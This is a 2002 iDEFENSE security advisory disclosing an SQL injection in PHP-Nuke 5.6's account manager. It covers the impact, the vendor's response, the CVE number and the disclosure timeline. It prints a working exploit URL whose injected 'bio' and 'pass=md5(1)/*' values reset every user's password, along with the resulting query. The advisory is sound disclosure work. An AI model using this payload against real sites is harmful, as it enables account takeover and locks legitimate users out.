Public Vulnerability Reports

PHP-Nuke SQL Injection Vulnerability

10.31.02

BACKGROUND

"PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases." More information is available at http://www.phpnuke.org.

DESCRIPTION

PHP-Nuke is susceptible to an SQL injection attack that allows an attacker to modify a user's table to his or her liking. It is possible for any registered user of the target system to launch this attack by feeding certain unfiltered characters to the account manager
module. The attacker can target a specific user or all system users at once. The key is the ability to insert a backslash into the "bio" field, thereby escaping a quote and leaving the SQL query open for injection. The following example will modify every PHP-Nuke users password to "1.":

Exploitation requires that the attacker log on, enter the account manager and determine his or her UID through the source of the page. If the attacker's UID is 2, he or she can then launch the attack by requesting the following URL:

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%
5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,
+bio=0,+pass=md5(1)/*

The injected query is constructed as follows:

UPDATE nuke_users
   SET name         = '',
       email        = '',
       femail       = '',
       url          = 'http://',
       pass         = 'xxxxx',
  +--[ bio          = '',
  |    user_avatar  = '',
  |    user_icq     = '',
  |    user_occ     = '',
  |    user_from    = '',
  |    user_intrest = '',
  |    user_sig     = '',
  |    user_aim     = '',
  |    user_yim     = '',
  |    user_msnm    = '',
  +--[ newsletter   = ',
       bio=0,pass=md5(1)/*' WHERE uid='2'

The marked area is all treated as a value to store into bio. The "where" clause is commented out, leaving an update statement that updates the entire table (ie: all users) to having a password of MD5(1).

ANALYSIS

Exploitation allows an attacker to compromise any other system account, thereby gaining the privileges and identification of the compromised account. The attacker can also corrupt the entire user's table, effectively denying service to legitimate users.

DETECTION

iDEFENSE Labs successfully tested and exploited this vulnerability in PHP-Nuke 5.6, Unix version. As the described exploit is dangerous in nature, administrators should not test in a production environment.

VENDOR RESPONSE

Francisco Burzi responded:

"PHP-Nuke version 6.0 is not vulnerable to the SQL injection attack...

Latest version is 6.0 and 6.5 under development. Old versions doesn't have support of any kind, all bugs and security fixes apply in the new versions. So, the solution to this security hole is to update the software from 5.6 to 6.0 version."

CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification number CAN-2002-1242 to this issue.

DISCLOSURE TIMELINE

09/17/2002 Issue disclosed to iDEFENSE
09/23/2002 Author notified through submission form
09/23/2002 iDEFENSE clients notified
10/01/2002 iDEFENSE second attempt at PHP-Nuke contact
10/20/2002 iDEFENSE third attempt at PHP-Nuke contact
10/31/2002 Response from Francisco Burzi (nukelite@users.sourceforge.net)
10/31/2002 Coordinated Public Disclosure

CREDIT

kill9 (kill9@hackers.com) is credited with discovering this vulnerability.